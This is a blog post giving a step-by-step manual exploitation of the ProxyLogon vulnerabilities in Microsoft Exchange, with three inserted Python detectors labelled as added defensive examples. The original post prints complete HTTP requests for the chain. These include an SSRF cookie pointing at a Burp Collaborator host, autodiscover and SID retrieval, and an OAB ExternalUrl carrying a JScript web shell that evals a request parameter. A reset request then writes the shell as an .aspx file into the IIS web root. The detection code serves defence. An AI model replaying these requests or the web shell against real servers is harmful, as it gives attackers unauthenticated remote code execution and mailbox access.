ProxyLogon exploitation method (manual use)


Preface

Having already written an article on a successful exploitation, and in order to work out why the locally built environment did not work, let's go through the relevant packets and the underlying principles once more.

Note: the publicly available exploit script has some problems and needs further modification before it works reliably. The script output below shows an example.

Introduction

The public exploit chains two vulnerabilities to obtain privileges: an SSRF and an arbitrary file write.

CVE-2021-26855 (SSRF): the flaw lies in how the front end proxies client requests to the back end. It can be used to obtain a user's SID, which is the most important step of the unauthenticated attack chain.

CVE-2021-27065 (file write): although the written content cannot be fully controlled, the file name and path can be set arbitrarily. When the file is written with an .aspx extension, a web shell embedded in the content gives remote control.

The overall process is as follows.

Exploitation in practice

CVE-2021-26855 SSRF

GET /owa/auth/yyyyyy.js HTTP/1.1
Host: mail.yangsir.git
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://mail.yangsir.git/owa/auth/logon.aspx?url=https%3a%2f%2fmail.yangsir.git%2fecp%2f%3fexsvurl%3d1%26p%3dVirtualDirectories&reason=0
Cookie: X-AnonResource=true; X-AnonResource-Backend=lg5vmst556l4ut5hg01cdlo6txzqnf.burpcollaborator.net/ecp/default.flt?~3
X-Forwarded-For: 8.8.8.8
Connection: close
Cache-Control: max-age=0
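As an added example (not from the original post or the exploit script it discusses), here is how a reverse proxy or WAF in front of OWA/ECP could flag the request shape shown above: a static-resource path under /owa/auth/ or /ecp/ carrying an X-AnonResource-Backend or X-BEResource cookie, whose value the front end treats as a back-end routing target. The sample requests, host names and cookie values are constructed for the demonstration; the parser handles both cookie forms that appear on this page.

```python
import re

# Constructed sample requests. The first mirrors the page's SSRF request shape, the
# second is a benign static-resource fetch, the third mirrors the later X-BEResource form.
SAMPLE_REQUESTS = [
    "GET /owa/auth/yyyyyy.js HTTP/1.1\r\n"
    "Host: mail.example.test\r\n"
    "Cookie: X-AnonResource=true; X-AnonResource-Backend=attacker.example/ecp/default.flt?~3\r\n"
    "Connection: close\r\n\r\n",
    "GET /owa/auth/15.1.2176/scripts/logon.js HTTP/1.1\r\n"
    "Host: mail.example.test\r\n"
    "Cookie: OutlookSession=abc\r\n\r\n",
    "POST /ecp/qqq.js HTTP/1.1\r\n"
    "Host: mail.example.test\r\n"
    "Cookie: X-BEResource=EXCH01/autodiscover/autodiscover.xml?a=~1942062522;\r\n"
    "Content-Length: 0\r\n\r\n",
]

# Cookie names the front end consults to pick a back-end target. Their presence on an
# unauthenticated static-resource request is the anomaly, whatever the value.
BACKEND_COOKIES = ("X-AnonResource-Backend", "X-BEResource")

# Static resources under the two virtual directories used by the published requests.
STATIC_PATH = re.compile(r"^/(owa/auth|ecp)/[^?]*\.(js|css|png|gif|flt)$", re.IGNORECASE)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers dict with lowercase names)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookies(header):
    """Parse a Cookie header into a dict; tolerates a trailing ';' as on the page."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if part:
            name, _, value = part.partition("=")
            cookies[name.strip()] = value.strip()
    return cookies


def backend_target(value):
    """Normalise the cookie value the proxy would route on: drop the '?...~version' suffix
    and split 'host[:port]/path' into (host, path)."""
    base = value.split("?", 1)[0]
    host, _, path = base.partition("/")
    return host, "/" + path


def inspect_request(raw):
    """Return a finding dict if a back-end override cookie rides on a static-resource
    path, otherwise None."""
    method, path, headers = parse_request(raw)
    cookies = parse_cookies(headers.get("cookie", ""))
    present = [name for name in BACKEND_COOKIES if name in cookies]
    if not present or not STATIC_PATH.match(path):
        return None
    name = present[0]
    host, target = backend_target(cookies[name])
    return {"method": method, "path": path, "cookie": name,
            "backend_host": host, "backend_path": target}


def scan(requests):
    """Run the check over a batch of raw requests and keep only the findings."""
    return [f for f in (inspect_request(r) for r in requests) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The check is deliberately on the cookie name plus the path class rather than on the cookie value: the value is attacker-chosen and varies per request, while an anonymous fetch of a .js file has no legitimate reason to carry a back-end routing cookie at all.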

CVE-2021-27065 file write

Set the OAB virtual directory's ExternalUrl to the web shell content

POST /ecp/DDI/DDIService.svc/SetObject?ActivityCorrelationID=e9cf840e-e595-facd-3710-afbe2aad22a8&schema=OABVirtualDirectory&msExchEcpCanary=54aREH4XW064p9E_YOEzj0AzPh6oUNkIW6PI1a8ziUpOwNZMxxxhaQeRm8wzpYDo18aE9sIw1FY. HTTP/1.1
Host: mail.yangsir.git
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=utf-8
Referer: https://mail.yangsir.git/ecp/VDirMgmt/EditOABVDir.aspx?pwmcid=5&ReturnObjectType=1&id=cde9e494-1dc4-4d03-898c-d00b04b9456f
Content-Length: 387
Cookie: X-BackEndCookie=S-1-5-21-2921479619-1120952621-1804897559-500=u56Lnp2ejJqBncfHnMjPzMvSysnOztLLmZyc0sfGzJzSys/PmcjMmsuezczJgYHNz83O0s/H0s3Jq8/NxcvMxc7N; msExchEcpCanary=54aREH4XW064p9E_YOEzj0AzPh6oUNkIW6PI1a8ziUpOwNZMxxxhaQeRm8wzpYDo18aE9sIw1FY.; PrivateComputer=true; ClientId=9C5BDFDA35A147F39F0E2590680F6ABC; X-OWA-JS-PSD=1; PBack=0; ASP.NET_SessionId=a69af73f-e5f2-4f51-9ad9-d978a9bbce96; TimeOffset=-480; Eac_CmdletLogging=false; SrvTrialChecked=true; cadata=06NwEfbphfaRV9ssqyInQlgydWqNPlQtZO3YxBSMwrRa+RalySU/CPAxhy/jqUEy8lAUDRG7wPwtheb4uiGnyiUjR15JHgzKgySIlRG9Azs=; cadataTTL=S4vlaLBame2nk4A/ae0yOg==; cadataKey=Debg0f+yPp6Dg8iiPU42hQ0EpTFD5Yrxj0aWXxSXl/Ta+eoraf3tAPoS7k6BPoQfjVSysCx2EcoYrShKfCT7bKAcpk1S4Kpj9U3NJgIazLSlnC/LHXmUpj02eNmqzUWoosJ90OVm6JqCrPSUkncZBJTBF7BSd7GuerZdW9/2PEPmUnkPOBGkAaGL6mR/QEL4mndw+koqTI0mkXixv/jrjJZomTOupgVS1sOiTkx1N8H19lhzcHHoNfvL+jFFP7ZMpCLkp0hKJUr++MBxNzu/zVieqggH2E5ZOpgEOB1w28uMFrMcTL9GCkOZU06i1jnHnqjgOZTDxwl//18LkjbE5w==; cadataIV=YCiLoW2R3fbX772qkkS+el/FDthDT6A9NOa7N9mChdEtY7U3qSxmkCDcO6GmUk8f6+O8UD3v3xVpFHOtsAR601tzFTGE9kZ399Mpnmf8atZYOLoehVJe8iD7b1NXu0MmQuZTpPNb84dn9lZZOqToffR8XDW2SEvBd7zk42CqoMwpcGUprhXDPdvXql6+tKZXviIuHd/uD8XW9N+KUFwvt2S3oI0sLU6aaKJQyiBOe52v3avwDOVQDR9vQmWdCnk+Z1wU+j7Cy/hsJ2edpWBI/2cwIQJSKhY3Q9YB0Y25/UWv2WaiCP3up90wE/ntrotTKwSiIxD9HsFSMcYsHy5rNg==; cadataSig=FmESD5gnVClB7HLgE81gQgjsXXQE6T3sg/aQ4K1gx199E16V5Owoqt2GZ26aikBGOUMUgyGy+MTrVrNWoTT6yh4G7Ax/RjahIXFZ8CBg+Ys7QZXP/zoCeR2jRQBGhNb/snHpPBb609i6Xabxsz2zf8ZIk5Z4Pq29oKBBSpQF5v8rE9Qy/9qkxwsejDh4i7+dl+gnXUXd5k51cIzZO7VfL+etT76/v6d3v1SabnY5gstaIn0kCsfAtyqQA7px3hm7i4puPa50ovFebpkkPcSfvErKlB+H4SLkJzBAJbBZaWgh2lC4sZpFeSG/MOfSLYuCE5Ccev70mK+VKeCFaM+2bQ==
X-Forwarded-For: 8.8.8.8
Connection: close

{"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"cde9e494-1dc4-4d03-898c-d00b04b9456f"},"properties":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","ExternalUrl":"http://mytest/<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}</script>"}}}

Pay attention mainly to ActivityCorrelationID and msExchEcpCanary; the latter is essential for the request to be accepted.

Reset the virtual directory

POST /ecp/DDI/DDIService.svc/SetObject?ActivityCorrelationID=06bd9c20-bcbb-e3bb-9501-9b4acca3cf39&schema=ResetOABVirtualDirectory&msExchEcpCanary=54aREH4XW064p9E_YOEzj0AzPh6oUNkIW6PI1a8ziUpOwNZMxxxhaQeRm8wzpYDo18aE9sIw1FY. HTTP/1.1
Host: mail.yangsir.git
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=utf-8
Referer: https://mail.yangsir.git/ecp/VDirMgmt/ResetVirtualDirectory.aspx?pwmcid=8&ReturnObjectType=1&id=cde9e494-1dc4-4d03-898c-d00b04b9456f&schema=ResetOABVirtualDirectory
Content-Length: 321
Cookie: X-BackEndCookie=S-1-5-21-2921479619-1120952621-1804897559-500=u56Lnp2ejJqBncfHnMjPzMvSysnOztLLmZyc0sfGzJzSys/PmcjMmsuezczJgYHNz83O0s/H0s3Jq8/NxcvIxczL; msExchEcpCanary=54aREH4XW064p9E_YOEzj0AzPh6oUNkIW6PI1a8ziUpOwNZMxxxhaQeRm8wzpYDo18aE9sIw1FY.; PrivateComputer=true; ClientId=9C5BDFDA35A147F39F0E2590680F6ABC; X-OWA-JS-PSD=1; PBack=0; ASP.NET_SessionId=a69af73f-e5f2-4f51-9ad9-d978a9bbce96; TimeOffset=-480; Eac_CmdletLogging=false; SrvTrialChecked=true; cadata=06NwEfbphfaRV9ssqyInQlgydWqNPlQtZO3YxBSMwrRa+RalySU/CPAxhy/jqUEy8lAUDRG7wPwtheb4uiGnyiUjR15JHgzKgySIlRG9Azs=; cadataTTL=S4vlaLBame2nk4A/ae0yOg==; cadataKey=Debg0f+yPp6Dg8iiPU42hQ0EpTFD5Yrxj0aWXxSXl/Ta+eoraf3tAPoS7k6BPoQfjVSysCx2EcoYrShKfCT7bKAcpk1S4Kpj9U3NJgIazLSlnC/LHXmUpj02eNmqzUWoosJ90OVm6JqCrPSUkncZBJTBF7BSd7GuerZdW9/2PEPmUnkPOBGkAaGL6mR/QEL4mndw+koqTI0mkXixv/jrjJZomTOupgVS1sOiTkx1N8H19lhzcHHoNfvL+jFFP7ZMpCLkp0hKJUr++MBxNzu/zVieqggH2E5ZOpgEOB1w28uMFrMcTL9GCkOZU06i1jnHnqjgOZTDxwl//18LkjbE5w==; cadataIV=YCiLoW2R3fbX772qkkS+el/FDthDT6A9NOa7N9mChdEtY7U3qSxmkCDcO6GmUk8f6+O8UD3v3xVpFHOtsAR601tzFTGE9kZ399Mpnmf8atZYOLoehVJe8iD7b1NXu0MmQuZTpPNb84dn9lZZOqToffR8XDW2SEvBd7zk42CqoMwpcGUprhXDPdvXql6+tKZXviIuHd/uD8XW9N+KUFwvt2S3oI0sLU6aaKJQyiBOe52v3avwDOVQDR9vQmWdCnk+Z1wU+j7Cy/hsJ2edpWBI/2cwIQJSKhY3Q9YB0Y25/UWv2WaiCP3up90wE/ntrotTKwSiIxD9HsFSMcYsHy5rNg==; cadataSig=FmESD5gnVClB7HLgE81gQgjsXXQE6T3sg/aQ4K1gx199E16V5Owoqt2GZ26aikBGOUMUgyGy+MTrVrNWoTT6yh4G7Ax/RjahIXFZ8CBg+Ys7QZXP/zoCeR2jRQBGhNb/snHpPBb609i6Xabxsz2zf8ZIk5Z4Pq29oKBBSpQF5v8rE9Qy/9qkxwsejDh4i7+dl+gnXUXd5k51cIzZO7VfL+etT76/v6d3v1SabnY5gstaIn0kCsfAtyqQA7px3hm7i4puPa50ovFebpkkPcSfvErKlB+H4SLkJzBAJbBZaWgh2lC4sZpFeSG/MOfSLYuCE5Ccev70mK+VKeCFaM+2bQ==
X-Forwarded-For: 8.8.8.8
Connection: close

{"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"cde9e494-1dc4-4d03-898c-d00b04b9456f"},"properties":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","FilePathName":"\\\\127.0.0.1\\c$\\inetpub\\wwwroot\\aspnet_client\\yangsir.aspx"}}}

Confirm the write succeeded
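The two SetObject requests above are what CVE-2021-27065 abuse looks like on the wire. As an added example, not code from the original post, the following inspects a DDIService.svc SetObject call for the tell-tale traits: an OABVirtualDirectory ExternalUrl that contains server-side script markup, and a ResetOABVirtualDirectory FilePathName that ends in a web-executable extension, points into the IIS web root, or uses an administrative share. The request bodies are constructed to match the page's shape; the canary value, host and identity GUID are placeholders.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Server-side script blocks never belong in a virtual directory URL.
SCRIPT_MARKUP = re.compile(r"<script\b[^>]*\brunat\s*=\s*[\"']?server", re.IGNORECASE)
# A reset "backup" file that IIS would execute if requested.
WEB_EXEC_EXT = re.compile(r"\.(aspx|asp|ashx|asmx|config)$", re.IGNORECASE)
# \\host\c$\... style UNC path to an administrative share.
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\[a-zA-Z]\$")

# Constructed SetObject calls as (request path with query, JSON body). The first mirrors
# the page's ExternalUrl payload shape, the second is a legitimate edit, the third mirrors
# the reset request. Canary and identity GUID are placeholders.
IDENTITY = ('"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)",'
            '"RawIdentity":"00000000-0000-0000-0000-000000000000"}')
PARAMS_TYPE = '"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel"'

SAMPLE_CALLS = [
    ("/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=PLACEHOLDER",
     '{' + IDENTITY + ',"properties":{"Parameters":{' + PARAMS_TYPE + ','
     '"ExternalUrl":"http://mail.example.test/<script language=\\"JScript\\" runat=\\"server\\">'
     'function Page_Load(){}</script>"}}}'),
    ("/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=PLACEHOLDER",
     '{' + IDENTITY + ',"properties":{"Parameters":{' + PARAMS_TYPE + ','
     '"ExternalUrl":"https://mail.example.test/OAB"}}}'),
    ("/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=PLACEHOLDER",
     '{' + IDENTITY + ',"properties":{"Parameters":{' + PARAMS_TYPE + ','
     '"FilePathName":"\\\\\\\\127.0.0.1\\\\c$\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\shell.aspx"}}}'),
]


def parse_setobject(path_with_query, body):
    """Pull the schema from the query string and the Parameters dict from the JSON body."""
    query = parse_qs(urlsplit(path_with_query).query)
    schema = query.get("schema", [""])[0]
    params = json.loads(body).get("properties", {}).get("Parameters", {})
    return schema, params


def inspect_setobject(path_with_query, body):
    """Return the list of suspicious traits found in one SetObject call (empty if clean)."""
    schema, params = parse_setobject(path_with_query, body)
    findings = []
    if schema == "OABVirtualDirectory":
        url = params.get("ExternalUrl", "")
        if SCRIPT_MARKUP.search(url):
            findings.append("ExternalUrl contains a server-side <script runat=server> block")
        elif "<" in url:
            findings.append("ExternalUrl contains markup characters")
    elif schema == "ResetOABVirtualDirectory":
        path = params.get("FilePathName", "")
        if WEB_EXEC_EXT.search(path):
            findings.append("FilePathName ends in a web-executable extension")
        if "wwwroot" in path.lower():
            findings.append("FilePathName points into the IIS web root")
        if ADMIN_SHARE.match(path):
            findings.append("FilePathName uses an administrative share (UNC) path")
    return findings


def audit(calls):
    """Run the check over (path, body) pairs; returns (index, findings) for flagged calls only."""
    flagged = []
    for index, (path, body) in enumerate(calls):
        findings = inspect_setobject(path, body)
        if findings:
            flagged.append((index, findings))
    return flagged


if __name__ == "__main__":
    for index, findings in audit(SAMPLE_CALLS):
        print(index, findings)
```

The same two checks apply to the configuration at rest: an OAB virtual directory whose ExternalUrl contains a `<script` tag, or a recent reset whose backup path ends in .aspx, is worth a look even when the request logs are gone.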

So far, these requests require a highly privileged account. To obtain a privileged mailbox without credentials, the SSRF is used to gather the information (SID and session values) needed to perform the file write.

Manual steps following the exploit script

Get the FQDN

The FQDN here is YANGDC; it can be obtained from the X-FEServer response header.

Get the LegacyDN

Using the FQDN, reach the internal /autodiscover/autodiscover.xml through the SSRF to obtain the LegacyDN of the target mailbox.

POST /ecp/qqq.js HTTP/1.1
Host: yangsir
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
ConTent-Type: text/xml
Cookie: X-BEResource=YANGDC/autodiscover/autodiscover.xml?a=~1942062522;
Content-Length: 343

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    <Request>
        <EMailAddress>administrator@yangsir.git</EMailAddress>
        <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
    </Request>
</Autodiscover>

Get the SID

Combine the LegacyDN with the fixed byte string below and send it to the /mapi/emsmdb interface; the resulting error response contains the complete SID.

string:\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00

The SID appears in the response like this:

Get ASP.NET_SessionId and msExchEcpCanary (these two values are very important)

This uses the proxyLogon interface; the response returns both values.

File write

Get the OAB virtual directory ID

Cookie: X-BEResource=Administrator@YANGDC:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=OaGJzy--vU2R2T-d7WgnQKEIrHpkUtkIL2V05u5UZBIcJCZcsaybXdfRX6aM2wkavtBoAi8SbjY.&a=~1942062522; ASP.NET_SessionId=e6d5b949-c1a2-4e98-bb5a-65b57526110f; msExchEcpCanary=OaGJzy--vU2R2T-d7WgnQKEIrHpkUtkIL2V05u5UZBIcJCZcsaybXdfRX6aM2wkavtBoAi8SbjY.

{"filter": {"Parameters": {"SelectedView": "", "SelectedVDirType": "All", "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel"}}, "sort": {}}

Change the virtual directory configuration

In my local environment the modification did not succeed, so I switched to a different environment for the demonstration.

In the new environment, modify the virtual directory configuration, setting ExternalUrl to our one-line web shell.

Reset the virtual directory

Confirm the web shell file name

Success
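From a defender's point of view, the whole chain above leaves a consistent trace in the front end's HttpProxy logs: every SSRF request is unauthenticated yet carries a client-chosen back-end target, which the front end records in the AnchorMailbox column with a ServerInfo~ prefix. Microsoft's published hunt for CVE-2021-26855 searches those logs for rows with an empty AuthenticatedUser and an AnchorMailbox matching ServerInfo~*/*. The following is an added example, not part of the original post, that runs that hunt over a constructed log excerpt and additionally flags hits whose target is the DDIService.svc SetObject endpoint used for the file write. The real logs carry many more columns, so the column subset, row values, IPs and host names here are assumptions.

```python
import csv
import io
from collections import Counter

# Constructed excerpt in the shape of an Exchange HttpProxy log (CSV with a header row).
# Real logs have many more columns; only those the hunt needs are kept. Hosts, IPs and
# timestamps are made up. Row 2-4 mirror the page's SSRF steps, row 5 is a normal admin action.
SAMPLE_HTTPPROXY_LOG = (
    "DateTime,UrlStem,AuthenticatedUser,AnchorMailbox,ClientIpAddress,HttpStatus,Method\n"
    "2021-03-05T10:00:01.000Z,/owa/auth/logon.aspx,,,203.0.113.10,200,GET\n"
    "2021-03-05T10:00:05.000Z,/owa/auth/yyyyyy.js,,"
    "ServerInfo~attacker.example/ecp/default.flt?~3,203.0.113.10,200,GET\n"
    "2021-03-05T10:00:09.000Z,/ecp/qqq.js,,"
    "ServerInfo~EXCH01/autodiscover/autodiscover.xml?a=~1942062522,203.0.113.10,200,POST\n"
    "2021-03-05T10:00:12.000Z,/ecp/y.js,,"
    "ServerInfo~Administrator@EXCH01:444/ecp/DDI/DDIService.svc/SetObject"
    "?schema=ResetOABVirtualDirectory&a=~1942062522,203.0.113.10,200,POST\n"
    "2021-03-05T10:01:00.000Z,/ecp/DDI/DDIService.svc/SetObject,CORP\\admin,"
    "Sid~S-1-5-21-1-2-3-500,10.0.0.5,200,POST\n"
)


def load_rows(text):
    """Parse the CSV log text into a list of dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def is_ssrf_proxy_hit(row):
    """Microsoft's published hunt: an unauthenticated request whose routing anchor is a raw
    ServerInfo target with a path component, i.e. supplied by the client rather than resolved
    from a mailbox."""
    anchor = row.get("AnchorMailbox", "") or ""
    return (row.get("AuthenticatedUser", "") == ""
            and anchor.startswith("ServerInfo~")
            and "/" in anchor)


def is_file_write_candidate(row):
    """Hit whose proxied target is the ECP SetObject endpoint (the CVE-2021-27065 step)."""
    return "DDIService.svc/SetObject" in row.get("AnchorMailbox", "")


def hunt(text):
    """Summarise SSRF hits: count, per-source-IP counts, proxied targets and write candidates."""
    hits = [r for r in load_rows(text) if is_ssrf_proxy_hit(r)]
    return {
        "hits": len(hits),
        "per_ip": dict(Counter(r["ClientIpAddress"] for r in hits)),
        "targets": [r["AnchorMailbox"].split("~", 1)[1] for r in hits],
        "file_write_candidates": sum(1 for r in hits if is_file_write_candidate(r)),
    }


if __name__ == "__main__":
    summary = hunt(SAMPLE_HTTPPROXY_LOG)
    print(f"{summary['hits']} SSRF-style proxy hits from {summary['per_ip']}")
    for target in summary["targets"]:
        print("  ->", target)
    print(f"{summary['file_write_candidates']} of them targeted DDIService.svc/SetObject")
```

In a real investigation the same filter is applied with Import-Csv over the files under the HttpProxy logging directory, and a single external IP producing several such rows within seconds, ending with a SetObject target, is the signature of this chain.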


Author: Yangsir
Reprint policy: unless otherwise stated, all articles in this blog are released under the CC BY 4.0 license. If reproduced, please credit the source: Yangsir!